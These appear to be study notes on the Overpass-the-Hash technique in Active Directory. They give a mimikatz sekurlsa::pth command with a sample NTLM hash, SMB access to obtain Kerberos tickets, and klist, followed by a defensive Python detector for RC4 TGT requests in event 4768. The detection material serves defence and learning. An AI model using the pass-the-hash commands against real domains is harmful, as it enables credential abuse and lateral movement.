Overpass-the-Hash

The goal is to use an NTLM hash to get a TGT. Once we have a TGT, we can access all Kerberos-protected services that we couldn't reach with only the NTLM hash.

Inside mimikatz:

> sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

This spawns a PowerShell session running under the injected credentials.

From this session we can, for example, trigger authentication to an SMB share:

net use \\files04

This should have generated a TGT and a TGS (service ticket for the file server). We can see them with:

klist

Now we can access the Kerberos-protected services.
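From the defender's side, the tell-tale artifact of this procedure is that an NTLM hash forces the TGT request to use RC4-HMAC (encryption type 0x17) in Security event 4768. The following is an added example, not part of the original notes, that flags such requests over a constructed event sample; it assumes the domain normally issues AES tickets and that the field names match the Windows 4768 event (TargetUserName, IpAddress, TicketEncryptionType, Status).

```python
"""Detection helper: flag Kerberos TGT requests (Security event 4768) made with RC4-HMAC.

Overpass-the-Hash with an NTLM hash makes the AS-REQ use RC4 (etype 0x17), so in a
domain where AES is the norm, a successful 0x17 TGT for a user account stands out.
"""

RC4_HMAC = "0x17"  # TicketEncryptionType value logged for RC4-HMAC

# Constructed sample 4768/4769 events; all values are invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jen", "IpAddress": "::ffff:192.0.2.10",
     "TicketEncryptionType": "0x17", "Status": "0x0"},          # RC4 TGT: suspicious
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:192.0.2.11",
     "TicketEncryptionType": "0x12", "Status": "0x0"},          # AES256 TGT: normal
    {"EventID": 4768, "TargetUserName": "legacyapp", "IpAddress": "::ffff:192.0.2.50",
     "TicketEncryptionType": "0x17", "Status": "0x0"},          # known RC4-only account
    {"EventID": 4768, "TargetUserName": "jen", "IpAddress": "::ffff:192.0.2.10",
     "TicketEncryptionType": "0x17", "Status": "0x18"},         # failed pre-auth: ignore
    {"EventID": 4769, "TargetUserName": "jen@CORP.COM", "IpAddress": "::ffff:192.0.2.10",
     "TicketEncryptionType": "0x17", "Status": "0x0"},          # service ticket, not a TGT
]


def find_rc4_tgt_requests(events, allowlist=frozenset()):
    """Return (user, source_ip) pairs for successful 4768 events that used RC4.

    allowlist: lower-cased accounts that legitimately still use RC4 (e.g. a legacy
    application account); they are skipped to cut known false positives.
    """
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue                      # only TGT requests (AS-REQ), not 4769
        if ev.get("Status") != "0x0":
            continue                      # only successful requests
        if ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
            continue
        user = ev.get("TargetUserName", "").lower()
        if user in allowlist:
            continue
        hits.append((user, ev.get("IpAddress", "")))
    return hits


if __name__ == "__main__":
    for user, ip in find_rc4_tgt_requests(SAMPLE_EVENTS, allowlist={"legacyapp"}):
        print(f"RC4 TGT issued to {user} from {ip}: possible Overpass-the-Hash")
```

A 4624 logon with logon type 9 (NewCredentials) on the source host shortly before the 4768 corroborates the `/run` step of the procedure above.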
